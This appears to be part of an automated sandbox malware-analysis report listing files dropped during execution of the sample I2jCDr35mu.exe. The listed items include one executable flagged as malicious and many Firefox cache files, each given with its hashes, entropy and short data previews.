                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Process:C:\Users\user\Desktop\I2jCDr35mu.exe
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):3001856
                                                                                                                                                                                  Entropy (8bit):7.9902601078319515
                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                  SSDEEP:49152:fBAdrMlL5e9wo9gMj0rnjBzhDqRBsFhU186LnFrq/OdncDhIYaMFEFT:KtJwogMYDll+R6FhtYdEwnW+YaMFqT
                                                                                                                                                                                  MD5:A19B05B874E77B99515C397C5DE13F48
                                                                                                                                                                                  SHA1:6996028DDF12116E8BB0FBCD5FA693DE0E14B78A
                                                                                                                                                                                  SHA-256:C6DC8E17A1D4A1545A12027D8FB15A2C625CE3781CD2062976861CEBAAE37A9A
                                                                                                                                                                                  SHA-512:4E0B6AA347062911D76DD6C6D575FD82CFA7F2C8C0A308967E77DC1ABDA2C7E14DFD0942869BDDD59E800359490FD2FC1AF08FFCD466428347473E20136001A4
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):188
                                                                                                                                                                                  Entropy (8bit):5.034151834805834
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:8llmlhO1YP3Ru/l3BMqEcldnX+OGTAMrRzcSLUxGTKlLjOKf6TaxXA8AsO7WYUmk:00hycKRiclp+OGb9LUxG0OKlmeO7WOen
                                                                                                                                                                                  MD5:FD65445315265AA7767443B9C5C520DF
                                                                                                                                                                                  SHA1:6FCE6A40E1B81753D9F463AD0906ACE1EABD2DB0
                                                                                                                                                                                  SHA-256:B540319A450B5AE67CA3A556A33A20BF5D321881840155D9EA3BEC7CDD4314C4
                                                                                                                                                                                  SHA-512:F776E58668A565FC962B24AAD69C0DB0A7626F34586EEE4EA9C4E6189878C40A6EB5C672DDE827C38ABFB412646A071D1AC2917182B67B8C3408134534889976
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:B..b........e..e..F.A........B....O^partitionKey=%28https%2Cyoutube.com%29,:https://www.youtube.com/.necko:classified.1.net-response-time-onstart.6331.net-response-time-onstop.25581.....
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):107
                                                                                                                                                                                  Entropy (8bit):4.562912914800682
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:xShOwllZRtl3BMqEcldnX+OGTAMrRzcSLUxGTKllllln:xShNlTPRiclp+OGb9LUxGmln
                                                                                                                                                                                  MD5:6FE364DD69D62B8B9ACE2307B8CD9E6E
                                                                                                                                                                                  SHA1:ED144759CA05CFC4A7D399C26534E489567348F8
                                                                                                                                                                                  SHA-256:9CE7B41B07C7ACC5964248C8CD61CD6C21AC0E7DA4A26801C2E15B577F638115
                                                                                                                                                                                  SHA-512:477E04168DCE2C75DA1059831AA06CFCC1CE29EA1DEAB0DF6EF517CD076E8DF9467AD980861B053DB60270D6B2EB6A9EF616EFBA99F4B1437D78661053A3D396
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:z{..........e..................B....O^partitionKey=%28https%2Cyoutube.com%29,:https://www.youtube.com/.....
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):15967
                                                                                                                                                                                  Entropy (8bit):6.072108678600926
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:y7VqN4mApqN3Xo70tNo+pwPm082nyFz/a7J:vApQHkKo+pwPo2J
                                                                                                                                                                                  MD5:8ACD80133AEBE337B69DAD4FE9794CA8
                                                                                                                                                                                  SHA1:506E108630FB33385026B09AD5A89289813DCDDE
                                                                                                                                                                                  SHA-256:F5122F86B0E46D166B264EDD8E225A2EB64A58F736D233CC3AD14E47A13415EB
                                                                                                                                                                                  SHA-512:13EB0D15D027802369222E111BB452861DE9E736150A988E9062D69F927078D7EFCEAD5B63F5911E7CA5EDF454D8FD58947F541CA34CA8C29920F2325CAE7CBC
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):35420
                                                                                                                                                                                  Entropy (8bit):5.086270303730476
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:aPtFYceo3KtwnY9nR+eXHxoZ/HJkNTBdHOT5Qhh7veK8t9KZF:Aeo3KtwnY9nR+eXHcHJk/dHOTij753F
                                                                                                                                                                                  MD5:B1846D94A205AFE84DA14DED30FC1A61
                                                                                                                                                                                  SHA1:A5EFD82AD8412B4AC7435381203142DF9DF4A602
                                                                                                                                                                                  SHA-256:928B27C3C7243586603625ABC511829C330C004D87D447483C337BABA37FF715
                                                                                                                                                                                  SHA-512:4A429E99C151CF5641DC3A9F68E68C8814109673EC2AE6DC71097A6FA86681FAA6FB0E9A6C3A0532553C3DFEDE8D26B1FADEEF8C2FCAFE653D31FF241DA28907
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<!doctype html>.<html>. <head>. <meta charset="utf-8">. <meta http-equiv="Content-Security-Policy" content="default-src 'none'; object-src 'none'; script-src resource: chrome:; connect-src https:; img-src https: data: blob: chrome:; style-src 'unsafe-inline';">. <meta name="color-scheme" content="light dark">. <title data-l10n-id="newtab-page-title"></title>. <link rel="icon" type="image/png" href="chrome://branding/content/icon32.png"/>. <link rel="localization" href="branding/brand.ftl" />. <link rel="localization" href="toolkit/branding/brandings.ftl" />. <link rel="localization" href="browser/newtab/newtab.ftl" />. <link rel="stylesheet" href="chrome://browser/content/contentSearchUI.css" />. <link rel="stylesheet" href="chrome://activity-stream/content/css/activity-stream.css" />. </head>. Cached: Wed, 21 Feb 2024 11:30:40 GMT -->. <body class="activity-stream">. <div id="header-asrouter-container" role="presentation"></div>. <div id="r
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):8559
                                                                                                                                                                                  Entropy (8bit):6.096215849886045
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:QNuoeyheEVGq8BRwtkQpSISkrJAy/Gk/KimiHfbaI8j3qWdUtdU8:QNuoeLYGBRohB1r1uk/KiFTaIdaOf
                                                                                                                                                                                  MD5:A4202F3AE8B916989D843AE3D806989E
                                                                                                                                                                                  SHA1:FB130000DC42AE9397B3B0CC5DF195F1255194F9
                                                                                                                                                                                  SHA-256:0B61A645009DA02B5920C1886F749723B9152779788E39E01640FB72AC37E0DD
                                                                                                                                                                                  SHA-512:53485E081605AB1AFE3FBCA32F8ACD51E2F21A3DEA7F2495D69CDBEBD140460421AA000920D3CE7B994BCD76EC123C868C5AE305416C70B7FE85B56D142400F8
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"project_name":"Remote Settings PROD","project_version":"18.0.0","http_api_version":"1.22","project_docs":"https://remote-settings.readthedocs.io","url":"https://firefox.settings.services.mozilla.com/v1/","settings":{"batch_max_requests":25,"readonly":true,"explicit_permissions":false},"capabilities":{"changes":{"description":"Track modifications of records in Kinto and store the collection timestamps into a specific bucket and collection.","url":"http://kinto.readthedocs.io/en/latest/tutorials/synchronisation.html#polling-for-remote-changes","version":"32.0.3","collections":["/buckets/blocklists","/buckets/blocklists-preview","/buckets/main","/buckets/main-preview","/buckets/security-state","/buckets/security-state-preview"]},"attachments":{"description":"Add file attachments to records","url":"https://github.com/Kinto/kinto-attachment/","version":"6.4.0","base_url":"https://firefox-settings-attachments.cdn.mozilla.net/"}}}|..3.............e...F.A.e..[...2....:https://firefox.settin
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):15844
                                                                                                                                                                                  Entropy (8bit):5.972901528432223
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:m7VqN4mApqN3Xo70tNo+pwPm082nyFz/iBY:TApQHkKo+pwPo2C
                                                                                                                                                                                  MD5:CBE0351FC76E873EC16491586802CA21
                                                                                                                                                                                  SHA1:D5F478368D65792CEFE1600B22A7C0B1D73AD26E
                                                                                                                                                                                  SHA-256:BC6DC35E0126B99B5F1B8C49FCB6A17FE989B09C02B0CB1DB53F45AF743D25DD
                                                                                                                                                                                  SHA-512:A46FD3EA895ACE389AA834AAFB6B14BDB6AB78A246A2C132CD53D42D29648BBAE3D72BCC2ADD8244D529353AA63F631C055654C8D70644ECE7DA548CF8230257
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:O^partitionKey=%28https%2Cgoogle.com%29,:https://accounts.google.com/.strongly-framed.0.security-info.
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):16730
                                                                                                                                                                                  Entropy (8bit):6.283149833978739
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:Z/+y7VqN4mApqN3Xo70tNo+pwPm082nyFz/aXE:Z/+vApQHkKo+pwPo2Y
                                                                                                                                                                                  MD5:97808674090C291F5B4EC70577362ED6
                                                                                                                                                                                  SHA1:B8B7843BFB86A5210571AABD3856D07C7E0A8986
                                                                                                                                                                                  SHA-256:A4F77ECF5F19B4303B4E3990B8CE987B1630A36AB7A69616782F459E8B98AFFF
                                                                                                                                                                                  SHA-512:5292F5119C7F85AFE37B2E55688D20D68C828F6D9BC197601B5DA3D8E88854EB3BD5CE07D2DD05F49D3AACF04EEA5CEFC664F5B55C2E984952B55F2995DA95A8
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):114
                                                                                                                                                                                  Entropy (8bit):4.680522047781059
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:4pqOwllZRtEtqiBMqEcldnX9XHWwrRzcSLYXqhHK//l:HNlTKiclpJWw9LYX2Kl
                                                                                                                                                                                  MD5:443F7AB19C3AF2A87FC04E037CD3CCEA
                                                                                                                                                                                  SHA1:E191165DEA7264BF984A3FEE526B708D32528924
                                                                                                                                                                                  SHA-256:9B98680185C873516C9A408EF8CACB468EC400971A923BF6C85F29C74BCC7E5F
                                                                                                                                                                                  SHA-512:0974F1E1A557305326767D715312CF6DCAEDC1AAE3C89C31F8BEB4D748B3FE4CCE4B4D8E5CE65E82ED5E96DF23B7F87FD096C091E45BB8FE624D76B0E127679F
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:=...........e..................I....O^partitionKey=%28https%2Cfacebook.com%29,:https://www.facebook.com/video.....
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):16726
                                                                                                                                                                                  Entropy (8bit):6.27974894074114
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:eXW7VqN4mApqN3Xo70tNo+pwPm082nyFz/aDD:eXjApQHkKo+pwPo2L
                                                                                                                                                                                  MD5:57E3CFE24F936E2F317534B6146B8674
                                                                                                                                                                                  SHA1:BB6129048944DAF542B55D9564B7BFA262A5A895
                                                                                                                                                                                  SHA-256:914802E1E533E1E4595A8918F047BF0EA82A246D561A0443E0E6936827951067
                                                                                                                                                                                  SHA-512:C9EE8080671C261A9052AEDF33580AD08C60C05CF1773F89CE5731FFCCAEE78E7E86B82F7237DC56EAEBE2DC3A9BC1E66E1FD1304D6D3B93C302FFF6B422D416
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):21815
                                                                                                                                                                                  Entropy (8bit):5.768346428320375
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:DGhqb4AexlNlP3me3mjeLYGBRohB1r1uk/KiFTaIdaOb:DGhqbNeVlP2e2je8GvIDuuKOa8b
                                                                                                                                                                                  MD5:D8BFC40DF3F6C81C451CEF05B6687033
                                                                                                                                                                                  SHA1:93B681803E23A8ED6D722501198F6FDDE4E08D22
                                                                                                                                                                                  SHA-256:4B34F0EEEE30C278C1B0BA88BE53234A6118D68F0EA254469DCC0EA92B96B1B0
                                                                                                                                                                                  SHA-512:7101BA84B94E961FC6273E382806B1978A4087FE29B75F6861DCCAEFE94A132AAD989D5836980840E179E16C91E5CA128B9D322D64B8A56CC84E4373BBC70BA7
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"metadata":{"sort":"-last_modified","schema":{"type":"object","required":["webExtension"],"properties":{"params":{"$ref":"#/definitions/params"},"default":{"$ref":"#/definitions/default"},"appliesTo":{"type":"array","items":{"$ref":"#/definitions/appliesToSection"},"title":"Applies To","description":"This section defines the region/locales/application information for where a search user is available, and any specifics for that region/locale/application. If there are no entries in the list, it is considered to be included everywhere"},"orderHint":{"$ref":"#/definitions/orderHint"},"extraParams":{"$ref":"#/definitions/extraParams"},"telemetryId":{"type":"string","title":"Telemetry Id","description":"The telemetry Id as used for some of SEARCH_COUNTS telemetry."},"regionParams":{"$ref":"#/definitions/regionParams"},"webExtension":{"$ref":"#/definitions/webExtension"},"defaultPrivate":{"$ref":"#/definitions/defaultPrivate"},"sendAttributionRequest":{"$ref":"#/definitions/sendAttribution
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:gzip compressed data, original size modulo 2^32 3758227456
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):11621
                                                                                                                                                                                  Entropy (8bit):6.406362354284618
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:kkKsIx8mq4ezAcYmSmhZwTWvoglqYmSmhZwTWvogrxsMHJm4nOdAna0Axk0CvDXU:PK3fqFymzwTWvoglJmzwTWvogrBHJm2Y
                                                                                                                                                                                  MD5:BEDAF48A9BEA4C3F9C9C3F718F2184E5
                                                                                                                                                                                  SHA1:A084FB076C0BAF2F2711B050B579F4EF80EF03D8
                                                                                                                                                                                  SHA-256:200F9550FC28808778525B93A3CAE29848586BB44E012179F87545878552C276
                                                                                                                                                                                  SHA-512:5D16D698E914E59C70A4612D9F7B7684B9A9E0EEC2CDA32435218CE5ACDA783F2D8704EAC307740CE5DBB4E3280EC48A2D7BF60C9D153B2661FDBD812DC6F33B
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:...........T.k.8...."..E.1...q6b.5.6l).;..;.1.G..+........v~4.v.O..53o.{.l....~...m '...K....._.pK.Z.../_..ff..c..OXOw.....'.~i'..l..c5...x. 5LAi....N.. o.,AcY.P.......%.'..zE]....b.`9..[......O<6.mM~[...Fm.!R.l....n..W.eC@....0.2...=u. %....e..".f,..q...6|.b.w".<.q..k...E.0.......~7...@W..H~.....q.i...c..G.......".X\$'...o3.`..=F.0....."Eq..............#8..A....i..3...\.*.......l.i....Y`|...Q....I..5.BA...9....{i.b8.3....Q..Z7.."9....>...&E.h7Up.f...._....\.{].O.jo....9U.....zlg.ubSSYa.....`. ...x(m.#...{....y7,i..T(..G.a.].... ........)..).......U....j..Q.MU..X..}.(..G.......Q|L.B....D.DA. ....z...[9Q..5..t..t......#..`3.>.......z.k`M/b...u}...0'..4z...V...M.i3Z..t..jo..y<y.n......K.a......@.......&........e...e...F.B.g.C....g....O^partitionKey=%28https%2Cgoogle.com%29,:https://www.gstatic.com/_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en_US.J6zlSvuPGsg.es5.O/ck=boq-identity.AccountsSignInUi.RCgm07LyQic.L.F4.O/am=P2CJlmMBEISZlnP-nnFyGAAAAA
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:gzip compressed data, original size modulo 2^32 196608
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):11693
                                                                                                                                                                                  Entropy (8bit):6.421845872364408
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:ePOFS7uRSj8TUmezPYmSmhZwTWvoglqYmSmhZwTWvogrxsMHJm4nOdAna0Axk0CY:JS7cSjMUzWmzwTWvoglJmzwTWvogrBHI
                                                                                                                                                                                  MD5:C80741957065DBFF0A213488833AC90C
                                                                                                                                                                                  SHA1:86D589420D637F3639C0FBE76D0487DD22B614F3
                                                                                                                                                                                  SHA-256:BAEF12303ECB8E1B4A66FDEE40448B51D7164DF5A538B38FB2771B9BED5E26BC
                                                                                                                                                                                  SHA-512:1BC39CA2A062755BF12EFE2FE81DD3CC0D74468EEB514470D9C4EEC43E80F058E238D34935C081F82213B706EA533DC61C8E54CA6DF42BC7FEB1116C776423FC
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:...........U]o.0.}.H.i.%...0T.....R..B.$V...$......|Ty.c.{.=.\.Mbh.:.\w-=.1..$..y.(...D.........(.e....%..+.D.*.VKGi.r..u...R..V........C.Y. .!.~g..U.bt..w:...].W;./,.:..%..b..{f....Z^.mN.E..He....}...qx...(*.".u....[..?.fB....9..x..(..=..>.C....RI..6.\.R.{}F.?..P.e.s......0q..7....`.c..D.K...s...W9...5..9U...K.$`...U.g.p:g....e..../h.$3H...T.KI..:....~)06u.f.1..9.0.h.J=..U.Y.....?....c2B..sb....T>f..&.F....N.C.....q...W...lVW..\.w&#....~.\$.q.|..s.....1..@..[...4...c..!.....!..#.. ..$.....QF....D[..q<.a..^y..4.#|..a..v.x...@M.....J...|......5..D....Q......<..T<H..k.U.|....L...}..!Jb..YT.F...h.yA*..h..E..X.....Y.sa.a..w.=g.....;i..2.n......}..6.<s..x3..n.q...,8.|....-./...J..p.*..h....V..}.....C.i.?..s.[......0V.........e...e...F.B.g.C.........O^partitionKey=%28https%2Cgoogle.com%29,:https://www.gstatic.com/_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en_US.J6zlSvuPGsg.es5.O/ck=boq-identity.AccountsSignInUi.RCgm07LyQic.L.F4
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:gzip compressed data, original size modulo 2^32 3053780992
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):12327
                                                                                                                                                                                  Entropy (8bit):6.618669962479176
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:+c+ELmZqlFmzwTWvoglJmzwTWvogrBHJm2OdAnAyCvDxkCvDx9:+c+6ARzSWvoI8zSWvoIBHJmvOq
                                                                                                                                                                                  MD5:69894EDC3DEA76EC42D9E73125554C02
                                                                                                                                                                                  SHA1:4DC29EE73C7979D94A91DB721A2B281666B5BC62
                                                                                                                                                                                  SHA-256:8260330963F8806BA25ADE97421D06C3F3F5DBDA16E9A07349CDF007F179763E
                                                                                                                                                                                  SHA-512:5F9B34F3A550CEFF0D7568BB259F30415DF5F57E026D78275E679F95DE9EBAABE4918A3750687D243C0B06AEB5FE39F0B383FE8BAB87345361570C14B97C9455
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:gzip compressed data, original size modulo 2^32 610468608
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):232738
                                                                                                                                                                                  Entropy (8bit):7.994563830658425
                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                  SSDEEP:6144:/XLSCG0sMMXbw/eULoIapxgJGZNdsHMcM:vN7MLw/NvafEGzCg
                                                                                                                                                                                  MD5:BDFAE4EE80FEB6797E3B07FE566057FA
                                                                                                                                                                                  SHA1:702D50BC212E8233C23A6B63AC13958988868402
                                                                                                                                                                                  SHA-256:A98FED06FE25D50642FB91439A8828CEDAC864A49D766B5A705B3DDEC2E260D3
                                                                                                                                                                                  SHA-512:B08600D6BF0669C5A7319B5C24725F4A0CFB1A4A1AC6D6713CA8E51765FFC1FA2D1290797E1766F1A48BB8C1EF447D0B8FB1F513CC74E893F12190D7B3207B47
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (45939)
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):146654
                                                                                                                                                                                  Entropy (8bit):5.3051622680379324
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3072:YQ5uEi/bA+TnJDpamoObnmodwbwnwmwowd6/yW8RNK+blic1rU6fJGnjkuC6hfM4:rblic1rU6fJGjQ6hkefClYT+Ksc6J8f
                                                                                                                                                                                  MD5:01FF2019E2F6F6219F64DC0598370B11
                                                                                                                                                                                  SHA1:0F3D323CCF7C2323643B16283B711FB9D8C3587F
                                                                                                                                                                                  SHA-256:7A05BED2743BBE7FDE39C5D96AD12BA36004A84C5DE5D4158F7D39454D68421B
                                                                                                                                                                                  SHA-512:47D65A3B6CC7FEE4F2C09BAC17731CF76D15D7A86BC02E13E34F5387ADBA0CE70709B9FD664D4CA1DC2024EEC86CAAEBE1AA97F5B340C230518EB94AFCECA962
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):492272
                                                                                                                                                                                  Entropy (8bit):7.997760148010294
                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                  SSDEEP:12288:u8fhrUPE5+8TK1g9M6y5JJtuiA50eHgB2rAnavTQ/:fZrUPE5I1g9M6yyZ0AgYra4s
                                                                                                                                                                                  MD5:DA393E9461C622229FCA32A8C125AA71
                                                                                                                                                                                  SHA1:50ED75D8C343D8BECA9ADC686AECB20AE603D6F1
                                                                                                                                                                                  SHA-256:61638A420404FD70E0BA99FE19578AEAE3AB8E9262D357E2D6AF26623DE3B078
                                                                                                                                                                                  SHA-512:F6031E8A24F42BC2AD359D64EC615B661EEAD1C8AE63B4347A25CB0A943ADB36DE73007F2F0C9BE064995AFA535AAF953A25570383AFDCCFE02D5B44E01A6F98
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:ISO Media, Apple iTunes ALAC/AAC-LC (.M4A) Audio
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):22596
                                                                                                                                                                                  Entropy (8bit):6.266296936537667
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:r9zEfS7jHgkwYJi0QN7VqN4mApqN3Xo70tNo+pwPm082nyFz/6RhRA:roS7jiYi0DApQHkKo+pwPo2W
                                                                                                                                                                                  MD5:A32B8152DA7AB1049AA89E020D8ED3BB
                                                                                                                                                                                  SHA1:564DC5B40A5FF807A12A700F46A8207D45C54B28
                                                                                                                                                                                  SHA-256:F7848DF7EAEDD5B3A1BAAD007500041AE83A4AF24666364D3013396DB44A7478
                                                                                                                                                                                  SHA-512:B4B30609ECDCD43AEABCC57A683BCB04F146A736A3F9C52CFEDBBD3AAB53B063A75A63272FB909BC8FFE9BBFD51FF2B022B76C2FDF273045D503383C49E49C99
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:gzip compressed data, original size modulo 2^32 738656256
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):12750
                                                                                                                                                                                  Entropy (8bit):6.705524600467346
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:XQmNNYQjfqzomzwTWvoglJmzwTWvogrBHJm2OdAnAlCvDxECvDxC:HB0zSWvoI8zSWvoIBHJmvOO
                                                                                                                                                                                  MD5:A7B435B8D6699BA47DEF971F0E113D27
                                                                                                                                                                                  SHA1:6C112183CBD6A0028BC1DE63E9961CCB8EF13704
                                                                                                                                                                                  SHA-256:E40F6665BC17AC7C719B6BB23325EDC8009A604C78960FF3D2E9DD62A8A0B2B0
                                                                                                                                                                                  SHA-512:6031DE3FAB3DDC180CA74BE3392861362308952CFB686CFA92709E5AB1DCAD5B610606A2AA7665683D7B1E0E4B15C4A609721BF25A42A87EBBBF1014809FB5A1
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):20662
                                                                                                                                                                                  Entropy (8bit):5.8118682849907595
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:pRLD5B9hAWv7+swreLYGBRohB1r1uk/KiFTaIda5r:pdD5B3LvyZre8GvIDuuKOa8e
                                                                                                                                                                                  MD5:099EE555B56A9CA21069BCCF09903AF8
                                                                                                                                                                                  SHA1:7465B4CEFC5F0476C293CE5138D7E593F7B2E652
                                                                                                                                                                                  SHA-256:9744454E200D10E0545C00902A82FECC7528594A11258279B78BB4864C179FBA
                                                                                                                                                                                  SHA-512:F8D9479BC4CEEF8A704DFCF6F9950B2E900B46FBF0E67D8B4C218E60F0296CCB59F0A8123E2208CA0B813E8AC8C65A9B42D0FC94745EB49A36BE185510A662D0
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:gzip compressed data, original size modulo 2^32 268632064
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):11654
                                                                                                                                                                                  Entropy (8bit):6.4405225602617096
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:oryU9rYUun89q4WOYmSmhZwTWvoglqYmSmhZwTWvogrxsMHJm4nOdAna0AxkDCvO:oryXU4uqltmzwTWvoglJmzwTWvogrBHZ
                                                                                                                                                                                  MD5:B955F03063B1909399C40CD5E11AD073
                                                                                                                                                                                  SHA1:797D3D3535B2FAF4E2E10E621DD887EDC332C5F2
                                                                                                                                                                                  SHA-256:ACAA812AB5C07237B941D9A99F1DB3B0D9CEF53F566050337DF43DFB77D64608
                                                                                                                                                                                  SHA-512:78A66FD444CA98E500B10F5E7488174F585BE5343CE47B3F28032C1DE5FD2105589280C7E0C29A163CD134AB9D5D26566906E04113FD891102FB35E43ECBD1B4
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):62882
                                                                                                                                                                                  Entropy (8bit):5.703371985751408
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:ETsMRensj20tJ9Z5Q6K3uwSXiRc0Pj+P3fPCz3s6cGEIga8hd5t9d5tx:ETcnsjDJtQ6K3urNajcfPCz3s6J8hvj
                                                                                                                                                                                  MD5:437F2A0482999DCC2B474C752FC769D6
                                                                                                                                                                                  SHA1:6DEE256F7C9801035EF9A0889F63D9A9744FDD67
                                                                                                                                                                                  SHA-256:7F41B0CC26D160C3D6EBDBF6F8FB8C865DD0C8B54C019675AB3BA6D1764BD4A3
                                                                                                                                                                                  SHA-512:970C5A8E6CDA9D1D7BAA8245E2517442D98B944A934FB1F57F8C18C4862195BF2F517E9382B2C7B17A532293615874541DF70D09602447E510478433688211C5
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):41322
                                                                                                                                                                                  Entropy (8bit):5.897515751096647
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:HVnPBh55zf2l2Yv5F23s6cGEIga8td5tJpd5tJb:HVnZ/5ql2S5F23s6J8tHpHb
                                                                                                                                                                                  MD5:4173F15DE2BE3627AFD3D4944149DA41
                                                                                                                                                                                  SHA1:848D5815FCE04E9C29E900F1EE457EF5FCFB9405
                                                                                                                                                                                  SHA-256:FEB48F8ABC0D381BBA27C9549D79E126FE261DD074DBFE91830E48F393AD6D3F
                                                                                                                                                                                  SHA-512:8FFA4E428CCABB4C0ECCD67A4FB6DD002E11C681D5DE04722FE603BD2B22FD4ED785344D1CC8F8600DF34EC46D12CC18A001693F0816402A0DEC3DB581404C2C
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):8402
                                                                                                                                                                                  Entropy (8bit):6.097488078079186
